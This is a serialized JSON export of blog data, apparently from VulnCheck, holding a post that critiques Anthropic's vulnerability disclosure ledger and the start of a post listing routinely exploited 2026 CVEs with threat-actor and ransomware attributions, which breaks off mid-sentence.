[{"data":1,"prerenderedAt":118775},["ShallowReactive",2],{"blogs":3},[4,245,1283,2945,3251,3361,3475,4405,10386,10836,10960,11213,11638,12121,12340,13178,14368,14773,19473,19758,19996,20175,21165,21755,22033,22712,23277,23690,25038,25508,25667,28147,29789,29997,30391,31233,31575,32054,32193,32474,33019,33175,33326,33535,33743,33975,34220,35966,36181,36738,37237,37570,39557,40497,40693,40896,41059,41218,41496,41808,42084,42358,42590,43052,43729,43977,44349,44574,44957,45089,45335,45507,53878,54492,54953,55258,57674,57897,58064,58359,58582,58909,59184,59397,59875,60094,60262,60409,60512,60712,60920,61409,62304,62477,63094,63308,63480,64275,64460,64562,64701,65167,65340,65664,66095,66199,66389,66600,67476,68013,68139,68278,68837,69247,69351,71602,72033,72131,72328,72522,73057,73315,73371,73643,73693,73738,73845,73977,74099,76694,78348,79424,81094,81334,82175,83377,83583,83926,84033,84755,85789,86076,87186,87311,89206,89932,91859,92128,93269,95222,96704,98686,99867,100729,103277,103572,103780,106084,107053,107762,109221,111309,111564,112220,112564,115668,118385,118751],{"id":5,"title":6,"articles":7,"authors":8,"body":14,"date":232,"description":233,"extension":234,"image":7,"link":7,"meta":235,"navigation":237,"path":238,"seo":239,"series":7,"stem":240,"subtype":7,"tags":241,"__hash__":244},"blog\u002Fblog\u002Fanthropic-ledger.md","Observations on Anthropic’s Vulnerability Disclosure Ledger",null,[9],{"name":10,"avatar":11,"link":12,"linkName":13},"Patrick Garrity","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U06EPQ5RXFU-475c2549c30d-512","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fpatrickmgarrity\u002F","in\u002Fpatrickmgarrity\u002F",{"type":15,"value":16,"toc":218},"minimark",[17,21,43,60,65,73,77,83,87,95,98,102,108,117,124,128,131,142,146,149,153,159,162,165,169,184,189,193,196,199,203,206,209],[18,19,20],"p",{},"Key Takeaways",[22,23,24,28,31,34,37,40],"ul",{},[25,26,27],"li",{},"Anthropic cited “thousands of high-severity vulnerabilities,” but the ledger does not include CVE-2026-4747 and still shows only 27 fixed findings, despite the dashboard announcement referencing 88 published advisories.",[25,29,30],{},"The next month will help show whether the ledger is being maintained as an active disclosure process. Ten undisclosed findings are already past Anthropic’s stated 90-day disclosure window, and 168 more will reach that mark soon.",[25,32,33],{},"Anthropic’s disclosure policy sends mixed messages. The policy references a 90-day publication window, a 45-day wait after patches, 14-day extensions and broader exceptions, which makes the practical disclosure clock less straightforward.",[25,35,36],{},"The ledger overlooks CVE\u002FGHSA mapping and cvss metrics used to calculate severity.",[25,38,39],{},"Only 1,596 of the 23,019 vulnerability candidates have reached maintainers so far, underscoring the human effort involved in validation, disclosure coordination and remediation that still have to happen.",[25,41,42],{},"Anthropic is not the only organization facing this challenge. Its ledger is an early public example of the pressure AI-assisted vulnerability discovery could place on maintainers, PSIRTs and open source security teams.",[18,44,45,46,53,54,59],{},"Since the initial announcement of Anthropic Glasswing, I've been ",[47,48,52],"a",{"href":49,"rel":50},"https:\u002F\u002Fgithub.com\u002Fpatrickmgarrity\u002FAnthropic-Credited-CVEs",[51],"nofollow","tracking vulnerabilities publicly disclosed that have been attributed to Anthropic",". In that announcement, Anthropic claimed \"Mythos Preview has already found thousands of high-severity vulnerabilities.\" I found it odd that only a single CVE discovered by Mythos was mentioned publicly in their research, so I was excited to see their first step toward transparency with the launch of the ",[47,55,58],{"href":56,"rel":57},"https:\u002F\u002Fred.anthropic.com\u002F2026\u002Fcvd\u002F",[51],"Anthropic Disclosure Ledger",".",[61,62,64],"h2",{"id":63},"exploring-anthropics-ledger","Exploring Anthropic’s Ledger",[18,66,67,72],{},[68,69],"img",{"alt":70,"src":71},"Software Supplier Trends","\u002Fblog\u002Fanthropic-ledger\u002Fledger-findings.png","\nIn my initial exploration of the Anthropic Ledger, I found it odd that the only CVE disclosed in Anthropic's initial Glasswing report, CVE-2026-4747, isn't listed on the disclosure ledger. And while the Glasswing vulnerability disclosure dashboard announcement claims 88 security advisories have been published, the dashboard has sat at just 27 fixed vulnerabilities and no additional findings since its launch nearly 3 weeks ago.",[61,74,76],{"id":75},"forecasting-disclosures","Forecasting Disclosures",[18,78,79,82],{},[68,80],{"alt":76,"src":81},"\u002Fblog\u002Fanthropic-ledger\u002Fledger-disclosures.png","\nWhile 27 findings have been patched and released, the 10 findings that have already passed Anthropic's 90 day disclosure policy deadline have yet to be revealed. In the next 30 days, 168 more findings will reach that 90-day deadline. Considering there have been no real updates to the ledger since launch, it will be interesting to see if Anthropic actually follows through on their disclosure policy.",[61,84,86],{"id":85},"contradicting-vulnerability-disclosure-policy","Contradicting Vulnerability Disclosure Policy",[18,88,89,94],{},[47,90,93],{"href":91,"rel":92},"https:\u002F\u002Fwww.anthropic.com\u002Fcoordinated-vulnerability-disclosure",[51],"Anthropic's coordinated vulnerability disclosure policy"," appears to contain contradicting statements. In one place it says \"we aim to share details publicly with defenders after 90 days, or after a patch is released, whichever comes first.\" In another it says, \"Once a patch is available, we would generally wait 45 days before publishing full technical details.\"",[18,96,97],{},"The policy also includes a host of caveats that carve out exceptions: a 14 day extension can be granted if a vendor or maintainer is engaged and making progress toward a fix as the 90 day deadline approaches, and in extenuating circumstances Anthropic reserves the right to adjust deadlines entirely.\nI'm not trying to be overly critical, but the lack of updates to the ledger in the first three weeks is worth calling out.",[61,99,101],{"id":100},"patches-pre-dating-reporting-timeline","Patches Pre-Dating Reporting Timeline",[18,103,104],{},[68,105],{"alt":106,"src":107},"Anthropic Timelines","\u002Fblog\u002Fanthropic-ledger\u002Ftimeline.png",[18,109,110,111,116],{},"Another observation worth noting is that there are several instances across the ledger where a patch appears to have been released before the vulnerability was even reported to the maintainer. This could mean the maintainer was already aware of and had fixed the vulnerability independently, but it may also highlight research collisions similar to what we saw with an OpenSSL vulnerability, where ",[47,112,115],{"href":113,"rel":114},"https:\u002F\u002Faisle.com\u002Fblog\u002Faisle-discovers-20-openssl-zero-days-in-6-months",[51],"AISLE discovered and provided a fix"," well before Anthropic reported it.",[18,118,119,120],{},"Example: ",[47,121,122],{"href":122,"rel":123},"https:\u002F\u002Fred.anthropic.com\u002F2026\u002Fcvd\u002Ffindings\u002FANT-2026-DJBBBBPE",[51],[61,125,127],{"id":126},"incomplete-cve-attribution","Incomplete CVE attribution",[18,129,130],{},"Only 14 of the vulnerabilities in the Anthropic ledger have a CVE associated with them in the ledger, however all of them do have a CVE. For example, the Ghost vulnerability disclosed by Anthropic as finding ANT-2026-H5T8XKWR has CVE-2026-26980 listed on its GitHub security advisory.",[18,132,119,133,137,141],{},[47,134,135],{"href":135,"rel":136},"https:\u002F\u002Fred.anthropic.com\u002F2026\u002Fcvd\u002Ffindings\u002FANT-2026-H5T8XKWR",[51],[47,138,139],{"href":139,"rel":140},"https:\u002F\u002Fgithub.com\u002FTryGhost\u002FGhost\u002Fsecurity\u002Fadvisories\u002FGHSA-w52v-v783-gw97",[51],"\nCVE-2026-26980",[61,143,145],{"id":144},"why-are-cvss-vectors-omitted-from-the-ledger","Why are CVSS vectors omitted from the ledger?",[18,147,148],{},"Anthropic's ledger update acknowledges that Claude overestimated the severity of vulnerabilities it discovered compared to third party manual assessments, but it doesn't mention CVSS as the basis for determining severity. It's also odd that the ledger includes severity ratings from Claude, a security research firm, and the maintainer, yet provides no base metrics to explain how those ratings were calculated. This omission makes it impossible to assess what factors might be driving Claude's inflated scores. Worth noting too that CVSS isn't mentioned anywhere in the report, leaving open the possibility that different methodologies or standards were used across assessments. Anthropic should be publishing the metrics used to determine severity.",[61,150,152],{"id":151},"what-about-the-20000-other-candidates","What about the 20,000+ other candidates?",[18,154,155],{},[68,156],{"alt":157,"src":158},"Anthropic","\u002Fblog\u002Fanthropic-ledger\u002Fanthropic-triage.png",[18,160,161],{},"Anthropic validated and reported 467 findings out of 23,000, with an additional 1,129 findings reported without validation at the maintainer's request. If it took roughly 60 days to send 1,596 findings, just 6.9% of the total, to maintainers, it puts the resource limitations around validating, reporting, and fixing AI-discovered vulnerabilities at this scale into sharp relief. At that pace it would take approximately 2.4 years to work through the backlog.\nDuring that time it's reasonable to expect other AI-assisted researchers will independently discover and report many of the same vulnerabilities. The more unsettling question is how many of those findings will be discovered and actively exploited by adversaries before Anthropic ever gets to them.",[18,163,164],{},"It's worth noting that not all 23,019 candidates would necessarily be reported, as many may not survive triage or validation. Even so, if the 21,000+ remaining candidates convert at a similar rate to what we've seen so far, the backlog challenge doesn't get meaningfully smaller.",[61,166,168],{"id":167},"resource-limitations-related-to-coordinated-vulnerability-disclosure","Resource Limitations Related to Coordinated Vulnerability Disclosure",[18,170,171,172,177,178,183],{},"The challenges Anthropic is facing with coordinated disclosure closely mirror what VulnCheck is hearing from PSIRTs and the open source community, both of which are being overwhelmed with vulnerability reports. It also aligns with the recent ",[47,173,176],{"href":174,"rel":175},"https:\u002F\u002Fwww.whitehouse.gov\u002Fpresidential-actions\u002F2026\u002F06\u002Fpromoting-advanced-artificial-intelligence-innovation-and-security\u002F",[51],"Executive Order on Promoting Advanced Artificial Intelligence Innovation and Security",", as well as the senior leader perspective published in The Cyber Defense Review, \"",[47,179,182],{"href":180,"rel":181},"https:\u002F\u002Fcyberdefensereview.army.mil\u002FPortals\u002F6\u002FDocuments\u002F2026-vol11-iss2\u002FCDR_V11_N2_Hathaway.pdf",[51],"Responsible Disclosure in the Age of AI: A Call for Urgent Action.","\"",[18,185,186],{},[68,187],{"alt":157,"src":188},"\u002Fblog\u002Fanthropic-ledger\u002Fexecutive-order.png",[61,190,192],{"id":191},"the-industry-challenges-ahead","The Industry Challenges Ahead",[18,194,195],{},"The ledger is a meaningful first step and transparency is hard, especially at this scale. But first steps only matter if they're followed through on. The security community is watching, and the next 30 days will be the real test as 168 findings hit the 90 day deadline. Whether Anthropic follows through on its disclosure policy will say a lot about whether the ledger is a genuine commitment or just a footnote.",[18,197,198],{},"These challenges aren't unique to Anthropic though. They're a preview of what the entire security ecosystem is about to face as AI-assisted vulnerability discovery scales across the industry. The question of how to validate, disclose, and remediate findings at machine speed with human processes is one the community hasn't solved yet. Anthropic is just the first organization doing it publicly enough to examine. How they handle what comes next matters well beyond their own ledger.",[61,200,202],{"id":201},"about-vulncheck","About VulnCheck",[18,204,205],{},"VulnCheck is helping organizations not just to solve the vulnerability prioritization challenge - we’re working to help equip any product manager, CSIRT\u002FPSIRT or SecOps team and Threat Hunting team to get faster and more accurate with infinite efficiency using VulnCheck solutions.",[18,207,208],{},"We knew that we needed better data, faster across the board, in our industry. So that’s what we deliver to the market. We’re going to continue to deliver key insights on vulnerability management, exploitation and major trends we can extrapolate from our dataset to continuously support practitioners.",[18,210,211,212,217],{},"Are you interested in learning more? If so, VulnCheck's ",[47,213,216],{"href":214,"rel":215},"https:\u002F\u002Fvulncheck.com\u002Fproduct\u002Fexploit-intelligence",[51],"Exploit & Vulnerability Intelligence"," has broad threat actor coverage. Register and demo our data today.",{"title":219,"searchDepth":220,"depth":220,"links":221},"",2,[222,223,224,225,226,227,228,229,230,231],{"id":63,"depth":220,"text":64},{"id":75,"depth":220,"text":76},{"id":85,"depth":220,"text":86},{"id":100,"depth":220,"text":101},{"id":126,"depth":220,"text":127},{"id":144,"depth":220,"text":145},{"id":151,"depth":220,"text":152},{"id":167,"depth":220,"text":168},{"id":191,"depth":220,"text":192},{"id":201,"depth":220,"text":202},"2026-06-09","Public CVE disclosure volumes are surging across major software suppliers and open source projects, and the evidence increasingly points to AI-assisted vulnerability discovery as the driving force.","md",{"slug":236},"anthropic-ledger",true,"\u002Fblog\u002Fanthropic-ledger",{"title":6,"description":233},"blog\u002Fanthropic-ledger",[242,243],"cve","ai","Csz4hpGoBaUlmpjvEu7pwd8JWWPDAeFcxVqkwNfK9oA",{"id":246,"title":247,"articles":248,"authors":254,"body":260,"date":1271,"description":1272,"extension":234,"image":7,"link":7,"meta":1273,"navigation":237,"path":1275,"seo":1276,"series":7,"stem":1277,"subtype":7,"tags":1278,"__hash__":1282},"blog\u002Fblog\u002Froutinely-targeted-vulnerabilities-may-2026.md","Quantifying 2026 Routinely Targeted Vulnerabilities (So Far)",[249],{"title":250,"source":251,"link":252,"date":253},"MSSP Market News: Vulnerability Management Moves From CVE Lists to Fixes","MSSP Alert","https:\u002F\u002Fwww.msspalert.com\u002Fnews\u002Fmssp-market-news-58-of-cisos-would-pay-the-ransom-thats-an-mssp-problem","2026-05-22",[255],{"name":256,"avatar":257,"link":258,"linkName":259},"Caitlin Condon","\u002Fteam\u002Fcaitlin-condon.jpg","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fccondon\u002F","in\u002Fccondon\u002F",{"type":15,"value":261,"toc":1261},[262,267,276,291,299,306,880,890,893,897,923,949,952,992,996,1011,1025,1029,1032,1045,1087,1090,1094,1127,1176,1180,1187,1200,1202,1205,1226],[263,264],"check-list",{":list":265,"ico":266,"title":20},"[\"VulnCheck identified 25 CVEs disclosed in 2026 that have been routinely targeted by adversaries and researchers so far this year, drawing from a global body of exploit code and exploitation data.\",\"Enterprise network edge technologies continue to be hard-hit by state-sponsored and sophisticated adversaries, while security researchers have prioritized vulnerabilities in AI platforms and open-source code bases.\",\"VulnCheck has observed a 59% increase in new KEVs when compared with the same period in 2025.\"]","mdi:check-bold",[18,268,269,270,275],{},"In February, VulnCheck introduced our 2025 Routinely Targeted Vulnerabilities list, a compilation of CVEs ",[47,271,274],{"href":272,"rel":273},"https:\u002F\u002Fwww.vulncheck.com\u002F2025-routinely-targeted-vulnerabilities",[51],"researched and exploited"," by a range of threat actors in 2025. Today, we’re releasing a list of 2026 vulnerabilities that our analysts have determined qualify for “Routinely Targeted” status based on a combination of threat actor, ransomware, and botnet targeting, along with public exploit density and breadth of in-the-wild exploitation evidence.",[18,277,278,279,284,285,290],{},"VulnCheck data captures risk and threat indicators across the entire vulnerability lifecycle, drawing on 500+ data sources to track exploit code maturity and validity, evidence of use in the wild, and threat actor attribution and tooling. VulnCheck’s ",[47,280,283],{"href":281,"rel":282},"https:\u002F\u002Fwww.vulncheck.com\u002Fproduct\u002Fcanary-intelligence",[51],"Canary Intelligence"," network also detects CVE-based and pre-CVE attacks against real vulnerable software deployments, which gives us ",[47,286,289],{"href":287,"rel":288},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Freturn-of-the-kinsing",[51],"insight"," into attacker behavior patterns and payload variants.",[18,292,293,294,298],{},"The following vulnerabilities have been disclosed ",[295,296,297],"strong",{},"and"," exploited in the wild in 2026, with one exception: SmarterTools SmarterMail CVE-2025-52691 was disclosed in late December 2025. Threat actor counts also include unattributed activity: All unattributed activity collectively is counted as one (1) threat actor instance in our calculations. General country-level attribution (e.g., Russia, China) is also collectively tracked as one (1) threat actor instance for any given CVE (per country).",[18,300,301,302,59],{},"This list is almost certain to change as the year goes on. Some vulnerabilities that don’t already have copious threat actor or ransomware citations will undoubtedly drop off our Routinely Targeted list by the end of the year, while others will gather new attributions and rise. For comparison, the full list of 2025 Routinely Targeted Vulnerabilities can be found ",[47,303,305],{"href":272,"rel":304},[51],"here",[307,308,309,335],"table",{},[310,311,312],"thead",{},[313,314,315,320,323,326,329,332],"tr",{},[316,317,319],"th",{"align":318},"center","CVE",[316,321,322],{"align":318},"Vuln",[316,324,325],{"align":318},"Exploits",[316,327,328],{"align":318},"Threat Actors",[316,330,331],{"align":318},"Ransomware",[316,333,334],{"align":318},"Notes",[336,337,338,363,387,409,431,453,475,497,518,539,560,581,602,623,644,666,687,709,731,753,775,795,815,836,858],"tbody",{},[313,339,340,348,351,354,357,360],{},[341,342,343],"td",{"align":318},[47,344,347],{"href":345,"rel":346},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-21509",[51],"CVE-2026-21509",[341,349,350],{"align":318},"Microsoft Office security feature bypass",[341,352,353],{"align":318},"2",[341,355,356],{"align":318},"6",[341,358,359],{"align":318},"No",[341,361,362],{"align":318},"Fancy Bear (RU), Razor Tiger (IN), North Korea attribution",[313,364,365,372,375,378,381,384],{},[341,366,367],{"align":318},[47,368,371],{"href":369,"rel":370},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-52691",[51],"CVE-2025-52691",[341,373,374],{"align":318},"SmarterTools SmarterMail unrestricted file upload",[341,376,377],{"align":318},"12",[341,379,380],{"align":318},"4",[341,382,383],{"align":318},"Yes",[341,385,386],{"align":318},"Storm-1175 (China), Static Kitten (Iran); ongoing exploitation observed by VulnCheck Canaries",[313,388,389,396,399,402,404,406],{},[341,390,391],{"align":318},[47,392,395],{"href":393,"rel":394},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-1281",[51],"CVE-2026-1281",[341,397,398],{"align":318},"Ivanti Endpoint Manager Mobile (EPMM) command injection",[341,400,401],{"align":318},"5",[341,403,380],{"align":318},[341,405,359],{"align":318},[341,407,408],{"align":318},"Static Kitten (Iran), China attribution",[313,410,411,418,421,424,426,428],{},[341,412,413],{"align":318},[47,414,417],{"href":415,"rel":416},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-1731",[51],"CVE-2026-1731",[341,419,420],{"align":318},"BeyondTrust RS and PRA command injection",[341,422,423],{"align":318},"7",[341,425,380],{"align":318},[341,427,383],{"align":318},[341,429,430],{"align":318},"Storm-1175 (China), Static Kitten (Iran)",[313,432,433,440,443,446,448,450],{},[341,434,435],{"align":318},[47,436,439],{"href":437,"rel":438},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-22769",[51],"CVE-2026-22769",[341,441,442],{"align":318},"Dell RecoverPoint for VMs hard-coded credentials",[341,444,445],{"align":318},"0",[341,447,380],{"align":318},[341,449,359],{"align":318},[341,451,452],{"align":318},"UNC6201 (China), SectorB (China), UAT-8616",[313,454,455,462,465,468,470,472],{},[341,456,457],{"align":318},[47,458,461],{"href":459,"rel":460},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-15556",[51],"CVE-2025-15556",[341,463,464],{"align":318},"Notepad++ supply chain incident",[341,466,467],{"align":318},"1",[341,469,380],{"align":318},[341,471,359],{"align":318},[341,473,474],{"align":318},"Supply chain incident; Lotus Blossom (China) attribution",[313,476,477,484,487,489,492,494],{},[341,478,479],{"align":318},[47,480,483],{"href":481,"rel":482},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-20700",[51],"CVE-2026-20700",[341,485,486],{"align":318},"Apple (multiple products) buffer overflow",[341,488,445],{"align":318},[341,490,491],{"align":318},"3",[341,493,359],{"align":318},[341,495,496],{"align":318},"UNC6353 (suspected RU), UNC6748",[313,498,499,506,509,511,513,515],{},[341,500,501],{"align":318},[47,502,505],{"href":503,"rel":504},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-1340",[51],"CVE-2026-1340",[341,507,508],{"align":318},"Ivanti Endpoint Manager Mobile (EPMM) code injection",[341,510,401],{"align":318},[341,512,491],{"align":318},[341,514,359],{"align":318},[341,516,517],{"align":318},"Iran, China attribution",[313,519,520,527,530,532,534,536],{},[341,521,522],{"align":318},[47,523,526],{"href":524,"rel":525},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-20127",[51],"CVE-2026-20127",[341,528,529],{"align":318},"Cisco Catalyst SD-WAN Manager authentication bypass",[341,531,356],{"align":318},[341,533,491],{"align":318},[341,535,359],{"align":318},[341,537,538],{"align":318},"UAT-8616, Iran attribution",[313,540,541,548,551,553,555,557],{},[341,542,543],{"align":318},[47,544,547],{"href":545,"rel":546},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-21513",[51],"CVE-2026-21513",[341,549,550],{"align":318},"Microsoft Windows MSHTML security feature bypass",[341,552,353],{"align":318},[341,554,491],{"align":318},[341,556,359],{"align":318},[341,558,559],{"align":318},"Fancy Bear (RU), SectorC (suspected RU)",[313,561,562,569,572,574,576,578],{},[341,563,564],{"align":318},[47,565,568],{"href":566,"rel":567},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-23760",[51],"CVE-2026-23760",[341,570,571],{"align":318},"SmarterTools SmarterMail authentication bypass",[341,573,401],{"align":318},[341,575,491],{"align":318},[341,577,383],{"align":318},[341,579,580],{"align":318},"Warlock ransomware, Storm-1175 (China), Storm-2603 (China)",[313,582,583,590,593,595,597,599],{},[341,584,585],{"align":318},[47,586,589],{"href":587,"rel":588},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-20131",[51],"CVE-2026-20131",[341,591,592],{"align":318},"Cisco Secure Firewall Management Center (FMC) deserialization",[341,594,467],{"align":318},[341,596,353],{"align":318},[341,598,383],{"align":318},[341,600,601],{"align":318},"Iran attribution, Interlock ransomware",[313,603,604,611,614,616,618,620],{},[341,605,606],{"align":318},[47,607,610],{"href":608,"rel":609},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-33634",[51],"CVE-2026-33634",[341,612,613],{"align":318},"Aquasecurity Trivy embedded malicious code",[341,615,491],{"align":318},[341,617,353],{"align":318},[341,619,359],{"align":318},[341,621,622],{"align":318},"Supply chain incident; TeamPCP attribution",[313,624,625,632,635,637,639,641],{},[341,626,627],{"align":318},[47,628,631],{"href":629,"rel":630},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-21858",[51],"CVE-2026-21858",[341,633,634],{"align":318},"n8n \"Ni8mare\" unauthenticated information disclosure",[341,636,377],{"align":318},[341,638,467],{"align":318},[341,640,359],{"align":318},[341,642,643],{"align":318},"Zerobot; not on CISA KEV",[313,645,646,653,656,659,661,663],{},[341,647,648],{"align":318},[47,649,652],{"href":650,"rel":651},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-24061",[51],"CVE-2026-24061",[341,654,655],{"align":318},"GNU Inetutils telnetd authentication bypass",[341,657,658],{"align":318},"49",[341,660,467],{"align":318},[341,662,383],{"align":318},[341,664,665],{"align":318},"Qilin ransomware, many public exploits",[313,667,668,675,678,680,682,684],{},[341,669,670],{"align":318},[47,671,674],{"href":672,"rel":673},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-24423",[51],"CVE-2026-24423",[341,676,677],{"align":318},"SmarterTools SmarterMail RCE",[341,679,401],{"align":318},[341,681,467],{"align":318},[341,683,383],{"align":318},[341,685,686],{"align":318},"Qilin ransomware",[313,688,689,696,699,702,704,706],{},[341,690,691],{"align":318},[47,692,695],{"href":693,"rel":694},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-31431",[51],"CVE-2026-31431",[341,697,698],{"align":318},"Linux Kernel \"Copy Fail\" privilege escalation",[341,700,701],{"align":318},"132",[341,703,467],{"align":318},[341,705,359],{"align":318},[341,707,708],{"align":318},"Most researched CVE of 2026 so far",[313,710,711,718,721,724,726,728],{},[341,712,713],{"align":318},[47,714,717],{"href":715,"rel":716},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-39987",[51],"CVE-2026-39987",[341,719,720],{"align":318},"marimo pre-auth RCE via terminal WebSocket",[341,722,723],{"align":318},"9",[341,725,467],{"align":318},[341,727,359],{"align":318},[341,729,730],{"align":318},"Broad exploitation and botnet weaponization observed by Sysdig",[313,732,733,740,743,746,748,750],{},[341,734,735],{"align":318},[47,736,739],{"href":737,"rel":738},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-41940",[51],"CVE-2026-41940",[341,741,742],{"align":318},"cPanel & WHM authentication bypass",[341,744,745],{"align":318},"26",[341,747,467],{"align":318},[341,749,383],{"align":318},[341,751,752],{"align":318},"Sorry ransomware, Mirai botnet exploitation",[313,754,755,762,765,767,770,772],{},[341,756,757],{"align":318},[47,758,761],{"href":759,"rel":760},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-20128",[51],"CVE-2026-20128",[341,763,764],{"align":318},"Cisco Catalyst SD-WAN Manager DCA User Takeover",[341,766,467],{"align":318},[341,768,769],{"align":318},"1*",[341,771,359],{"align":318},[341,773,774],{"align":318},"Cisco Talos has observed at least 10 different threat clusters exploiting this vulnerability as part of the \"XenShell\" exploit",[313,776,777,784,787,789,791,793],{},[341,778,779],{"align":318},[47,780,783],{"href":781,"rel":782},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-20133",[51],"CVE-2026-20133",[341,785,786],{"align":318},"Cisco Catalyst SD-WAN Manager Information Disclosure Vulnerability",[341,788,467],{"align":318},[341,790,769],{"align":318},[341,792,359],{"align":318},[341,794,774],{"align":318},[313,796,797,804,807,809,811,813],{},[341,798,799],{"align":318},[47,800,803],{"href":801,"rel":802},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-20122",[51],"CVE-2026-20122",[341,805,806],{"align":318},"Cisco Catalyst SD-WAN Manager UploadAck File Overwrite",[341,808,467],{"align":318},[341,810,769],{"align":318},[341,812,359],{"align":318},[341,814,774],{"align":318},[313,816,817,824,827,829,831,833],{},[341,818,819],{"align":318},[47,820,823],{"href":821,"rel":822},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-29014",[51],"CVE-2026-29014",[341,825,826],{"align":318},"MetInfo CMS unauthenticated PHP code injection",[341,828,467],{"align":318},[341,830,769],{"align":318},[341,832,359],{"align":318},[341,834,835],{"align":318},"VulnCheck Canaries detecting consistent exploitation; not on CISA KEV",[313,837,838,845,848,851,853,855],{},[341,839,840],{"align":318},[47,841,844],{"href":842,"rel":843},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-23744",[51],"CVE-2026-23744",[341,846,847],{"align":318},"MCPJam inspector missing authentication",[341,849,850],{"align":318},"19",[341,852,467],{"align":318},[341,854,359],{"align":318},[341,856,857],{"align":318},"Highly researched (public exploits); not on CISA KEV",[313,859,860,867,870,873,875,877],{},[341,861,862],{"align":318},[47,863,866],{"href":864,"rel":865},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-33017",[51],"CVE-2026-33017",[341,868,869],{"align":318},"Langflow unauthenticated code injection",[341,871,872],{"align":318},"13",[341,874,467],{"align":318},[341,876,359],{"align":318},[341,878,879],{"align":318},"Internet-facing hosts have ballooned since disclosure, suggesting honeypot deployment",[22,881,882],{},[25,883,884,885,889],{},"See ",[886,887,888],"code",{},"A Note on Cisco SD-WAN CVEs"," below for threat actor calculations on these vulnerabilities.",[18,891,892],{},"Much like VulnCheck's 2025 Routinely Targeted list, the vulnerabilities above aren't meant to be taken as a one-dimensional hierarchy of CVEs expressed as a top-to-bottom list. VulnCheck analyzes several different types of exploit data, each of which can change a vulnerability’s ranking meaningfully when prioritized or filtered out.",[61,894,896],{"id":895},"_2026-top-threat-actor-and-ransomware-cves","2026 Top Threat Actor and Ransomware CVEs",[18,898,899,900,905,906,911,912,917,918,922],{},"It’s still early in the year, but a handful of front-runners have already emerged. CVE-2026-21509, a security feature bypass in Microsoft Office that was weaponized in zero-day document-based attacks in January 2026, was exploited by Fancy Bear (APT28) in a well-publicized ",[47,901,904],{"href":902,"rel":903},"https:\u002F\u002Fblog.polyswarm.io\u002Ffancy-bear-leveraging-cve-2026-21509-in-operation-neusploit",[51],"series"," of ",[47,907,910],{"href":908,"rel":909},"https:\u002F\u002Fwww.trellix.com\u002Fblogs\u002Fresearch\u002Fapt28-stealthy-campaign-leveraging-cve-2026-21509-cloud-c2\u002F",[51],"incidents"," targeting Central and Eastern Europe (including ",[47,913,916],{"href":914,"rel":915},"https:\u002F\u002Fcert.gov.ua\u002Farticle\u002F6287250",[51],"Ukraine","). A trio of vulnerabilities in SmarterTools SmarterMail (CVE-2025-52691, CVE-2026-23760, and CVE-2026-24423) disclosed between late December 2025 and late January 2026 have seen exploitation by Iranian and (multiple) Chinese-backed threat actors, as well as the Qilin and Warlock ransomware families; VulnCheck’s ",[47,919,283],{"href":920,"rel":921},"https:\u002F\u002Fdocs.vulncheck.com\u002Fproducts\u002Fcanary-intelligence",[51]," network has continued to detect ongoing exploitation of all three flaws, with new detections still coming in at time of writing. And CVE-2026-41940, a zero-day auth bypass in cPanel and WHM disclosed publicly in late April 2026, has accumulated exploitation by the Sorry ransomware family and the Mirai botnet, in addition to racking up more than two dozen public exploits.",[18,924,925,926,931,932,936,937,942,943,948],{},"To absolutely nobody’s surprise, enterprise network edge gear has also been hit hard so far this year, with Ivanti Endpoint Manager Mobile (EPMM), BeyondTrust Remote Support (RS), Cisco Secure Firewall Management Center (FMC), and Cisco SD-WAN all seeing notable threat activity. Ivanti CVE-2026-1281 (command injection) and CVE-2026-1340 (code injection) were used in Chinese and ",[47,927,930],{"href":928,"rel":929},"https:\u002F\u002Fctrlaltintel.com\u002Fresearch\u002FMuddyWater\u002F",[51],"Iran","-linked reconnaissance and exploitation campaigns; BeyondTrust CVE-2026-1731 (command injection) was exploited by Iranian-backed ",[47,933,935],{"href":928,"rel":934},[51],"MuddyWater"," and Chinese threat actor ",[47,938,941],{"href":939,"rel":940},"https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fsecurity\u002Fblog\u002F2026\u002F04\u002F06\u002Fstorm-1175-focuses-gaze-on-vulnerable-web-facing-assets-in-high-tempo-medusa-ransomware-operations\u002F",[51],"Storm-1175","; Cisco Secure Firewall Management Center CVE-2026-20131 was exploited by the ",[47,944,947],{"href":945,"rel":946},"https:\u002F\u002Faws.amazon.com\u002Fblogs\u002Fsecurity\u002Famazon-threat-intelligence-teams-identify-interlock-ransomware-campaign-targeting-enterprise-firewalls\u002F",[51],"Interlock 